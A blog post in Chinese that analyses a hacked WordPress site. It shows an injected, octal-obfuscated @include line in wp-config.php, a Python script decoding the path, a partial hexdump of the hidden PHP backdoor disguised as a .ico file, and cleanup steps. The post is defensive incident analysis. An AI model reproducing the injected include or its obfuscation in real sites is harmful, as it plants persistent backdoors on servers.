WordPress目录下产生一堆随机文件

WordPress目录下突然多了一堆随机文件,本文分析原因并给出解决方法。

1. 问题描述

站点很慢,登录服务器,查看WordPress目录下文件,发现多了一堆随机文件:

$ ls
0gikql  5wrCju  b8O49g        f4GMY8        HYA9ej              kDQYM5       mo0VOK  P4GJE9  readme.html           sztmJh  vmopCD                WYurax
0Nt3ai  6IxnR2  BJPmv3        F9UewA        i05cZx              KoILCl       Mpo23r  P9urRg  RikuDf                tcuEoM  vPpxGQ                WzHlSy
1btGns  6LadTs  BKTtO2        fdHpcg        I1wgPc              KQtFeJ       Mq8IBJ  PAZGYC  rIsH3J                temYKM  vsb4Pa                x7i9ld
1dE7nq  6S1sTI  bol1RB        fkl3vnao.php  i92lAK              kRp2BJ       mQX5AB  PBI0H7  rkidLe                tFfDvU  VWC2OG                x9KLuU
1lYQmO  7CGOfH  bovO9e        fLW0V2        Ice8jb              kVxA8c       myGZLc  pfo3wA  RM1pJ3                thNrdu  w3l6sr                Xbzx3V
1o6NA5  7DsKmG  c2upDS        Fp9PAK        index.html          KzvHpw       n637Vl  pfVNuU  robots.txt            TJQlg5  wGOCyd                xMf81k
1RbKYZ  7s2zmJ  cedra.php     fqVnxP        index.html.bak.bak  LekHB4       n71YEF  PgpmxL  rOUjBZ                TOhfr2  WlK7pq                xmlrpc.php
1RTS9x  7viuOQ  cikb8t        fxtNke        index.php           LfDQmz       nbBshv  pilVOc  rPCUvy                TtL1gs  wMKj5p                xOiWZE
2gBwbA  831znT  cLmoYR        GgCu5t        irXhoV              lgmwGp       NCbOUT  pj0giP  rpjRAe                u2UeTr  wp-activate.php       XwyvgQ
2JQwrP  87cOJQ  CpfrIM        gj6Y2P        j0gAap              license.txt  Ncv5CP  pJX83r  rPpaVJ                U40FXW  wp-admin              xXN8ny
2TNcjr  8oNr4B  cSUoat        GJcs1r        J3Tg74              LoB1pc       nGzcbR  PrjoZC  rUzovE                u5HGLo  wp-blog-header.php    Y9RnEg
2VjbU9  8yXQxL  CWc5UF        gtnieC        J5iIA2              LoGUbi       nid7Of  prOhvm  RwybzA                UByF42  wp-comments-post.php  Y9Sv5z
2Zetzc  93ixUw  DERPhl        guYNnG        J8S07q              lTICBw       nu4owe  Q1f4J5  s5Xi9Z                UDTvts  wp-config.php         yFtdpO
32WwMV  9aXSWv  dHno50        gXKyPw        j9nTPV              Luf5yF       NXWPV4  Q1htMb  S6igQl                uH6lRc  wp-config-sample.php  ynj40s
34VGiD  9G8pOx  dNh1bf        H1xCT5        jaXDYE              LvbXlZ       NYB68x  Q4Nh0a  SCLITK                UHmBrM  wp-content            yNTaIU
3f2Alk  9mXrR6  dpyxvjlx.php  h5U1Vs        JcIQDC              lVXA0Q       o0XVOT  q6juvQ  seMD69                UIcjXf  wp-cron.php           YXi09N
3oekQf  9NpvET  dSTKfF        HayrqI        jekDzO              M0kpNZ       ofFm8D  Q6x8Ab  SEN0qz                uo7rDZ  wp-includes           ZEUtmG
3rbpsF  9y3CVk  DXA8UM        HG0sOY        jeYQtA              m8Kdby       OfZcMq  q81zai  sevlus.php.suspected  UP1cQ0  wp-links-opml.php     zFAIkD
41vkNm  A5sVBR  dxeZmC        Hg8ACz        jk21ZV              MAb9hy       OG6uXT  qDWb6h  SLtXnQ                uPfexj  wp-load.php           zKLEo3
4AmdTM  ahGxsc  E7uxVT        hJMlmE        JLDRWq              maYAl4       OgBnkt  qmXdeo  snovles.php           USGOT1  wp-login.php          zlF8uX
4I6JXi  AIE3Wo  EBO3e2        hlfswt        JLRyEh              mgu6d9       Oi41fV  QS8KZU  SOqTKe                uTKvih  wp-mail.php           zxnRpT
4rC8LJ  ALaTRs  EuMRBw        hsbs77vi.php  jMH6xL              mh           OUnI81  Qv7shy  SQI7l1                uVyeT8  wp-settings.php       zY9e4v
4SksdN  alPMQo  eyT6lI        HSDk1W        jSiwtr              MHrDRe       oUP46c  qwPcQ2  sSIGJF                uwvBLD  wp-signup.php
52CR7s  aSkqyG  ezhpqZ        HWdv3f        K6qTfs              mic.php      OVLIzC  R5DteT  stbpT0                V6BnP8  wp-trackback.php
5Reia7  aT0thJ  F1kgtx        hX7Ciq        K907cV              MjIm2e       ozgDkq  r91iOl  Sw61PJ                VJ6X2U  WxJtdi

文件大小有的是0,有的是2.3M。

$ ls -lsh
total 283M
   0 -rwxr-xr-x  1 www-data www-data    0 Mar  9 14:22 0gikql
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar  8 20:49 0Nt3ai
   0 -rwxr-xr-x  1 www-data www-data    0 Mar 11 10:41 1btGns
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar 10 20:05 1dE7nq
2.3M -rwxr-xr-x  1 www-data www-data 2.3M Mar 10 23:42 1lYQmO
   0 -rwxr-xr-x  1 www-data www-data    0 Mar  9 20:52 1o6NA5
   0 -rwxr-xr-x  1 www-data www-data    0 Mar 11 20:04 1RbKYZ

2. 问题分析

偶然间,发现wp-config.php多了以下这几行代码:

$ cat zhilitea.com/wp-config.php | more
<?php
/*dbfd6*/

@include "\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o";

/*dbfd6*/

\057是八进制,实为斜杠/,那么把"\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o"转换下(Python源码如下),可以得到/var/www/zhilitea.com/wp-includes/js/tinymce/.4584c2b5.ico

#!/usr/bin/env python3

s = "\057var\057www\057zhi\154ite\141.co\155/wp\055inc\154ude\163/js\057tin\171mce\057.45\0704c2\1425.i\143o"

l = list()
for i in range(0, len(s), 4):
    l.extend([str(s[i]), s[i+1:i+4]])   # /var

path = ''.join(l)

print(path)
# /var/www/zhilitea.com/wp-includes/js/tinymce/.4584c2b5.ico

还真有这个文件:

/var/www/zhilitea.com/wp-includes/js/tinymce$ ls -la .4584c2b5.ico 
-rw-r--r-- 1 www-data www-data 9404 Apr  9  2019 .4584c2b5.ico

用Vim在十六进制下查看(在命令模式下输入:%!xxd,回车),其文件内容:

00000000: 3c3f 7068 700a 245f 6532 7861 3720 3d20  <?php.$_e2xa7 = 
00000010: 6261 7365 6e61 6d65 2f2a 7438 7737 2a2f  basename/*t8w7*/
00000020: 282f 2a39 2a2f 7472 696d 2f2a 3165 7576  (/*9*/trim/*1euv
00000030: 2a2f 282f 2a68 3477 3639 2a2f 7072 6567  */(/*h4w69*/preg
00000040: 5f72 6570 6c61 6365 2f2a 7670 616d 2a2f  _replace/*vpam*/
00000050: 282f 2a35 386c 792a 2f72 6177 7572 6c64  (/*58ly*/rawurld
00000060: 6563 6f64 652f 2a77 7434 6f36 2a2f 282f  ecode/*wt4o6*/(/
00000070: 2a7a 2a2f 2225 3246 2535 4325 3238 2e25  *z*/"%2F%5C%28.%
00000080: 3241 2532 3425 3246 222f 2a6d 702a 2f29  2A%24%2F"/*mp*/)
00000090: 2f2a 3176 712a 2f2c 2027 272c 205f 5f46  /*1vq*/, '', __F
000000a0: 494c 455f 5f2f 2a69 2a2f 292f 2a32 2a2f  ILE__/*i*/)/*2*/
000000b0: 2f2a 356d 327a 302a 2f29 2f2a 6a6c 682a  /*5m2z0*/)/*jlh*
000000c0: 2f2f 2a33 3630 2a2f 292f 2a66 7a35 2a2f  //*360*/)/*fz5*/
000000d0: 3b24 5f73 3666 3064 3537 203d 2022 4752  ;$_s6f0d57 = "GR
000000e0: 2531 3525 3130 2531 3525 3037 5725 3034  %15%10%15%07W%04
000000f0: 2535 4325 3430 2530 4325 3037 4725 3039  %5C%40%0C%07G%09
00000100: 4741 4a51 2530 325f 2533 4456 4125 3037  GAJQ%02_%3DVA%07
00000110: 2531 3725 3041 5625 3430 6a25 3542 4625  %17%0AV%40j%5BF%
00000120: 3036 5325 3136 5025 3045 4e4a 4625 3234  06S%16P%0ENJF%24
00000130: 4f25 3346 2535 4351 2530 3525 3542 2530  O%3F%5CQ%05%5B%0
00000140: 4350 2530 364e 2531 3025 3142 2535 4351  CP%06N%10%1B%5CQ
00000150: 5455 6b25 3030 2535 4425 3043 414b 2531  TUk%00%5D%0CAK%1
00000160: 3125 3137 304d 4650 5925 3430 2530 3625  1%170MFPY%40%06%
00000170: 3132 4525 3139 2530 4558 4a54 2532 3474  12E%19%0EXJT%24t
00000180: 2535 4356 2535 4425 3343 4125 3037 4125  %5CV%5D%3CA%07A%
00000190: 3036 4e25 3036 2531 4425 3543 2535 4247  06N%06%1D%5C%5BG
000001a0: 6758 2530 4355 4525 3139 2530 4525 3237  gX%0CUE%19%0E%27
000001b0: 3625 3233 6225 3144 2530 4578 2535 4425  6%23b%1D%0Ex%5D%
000001c0: 3044 2535 4225 3344 464b 2531 444b 4842  0D%5B%3DFK%1DKHB
000001d0: 2535 4252 6751 2531 3125 3430 2530 4447  %5BRgQ%11%40%0DG
000001e0: 2535 444e 4f4f 2531 4525 3144 2530 4578  %5DNOO%1E%1D%0Ex
000001f0: 2535 4425 3044 2535 4225 3344 464b 2531  %5D%0D%5B%3DFK%1

现在问题清晰了,运行wp-config.php,就会加载上述PHP文件(@include .4584c2b5.ico),并运行该PHP,产生一堆随机文件。

3. 解决方法

解决方法:删除文件.4584c2b5.ico,删除wp-config.php中多出来的代码,并移除wp-config.php组的写权限。

/var/www/zhilitea.com$ sudo chmod 640 wp-config.php 
/var/www/zhilitea.com$ ls -l wp-config.php 
-rw-r----- 1 www-data www-data 2937 Aug 28 21:03 wp-config.php

同时,将如下代码添加到.htaccess尾部:


<files wp-config.php>
order allow,deny
deny from all
</files>
```

Leave a Reply

Your email address will not be published. Required fields are marked *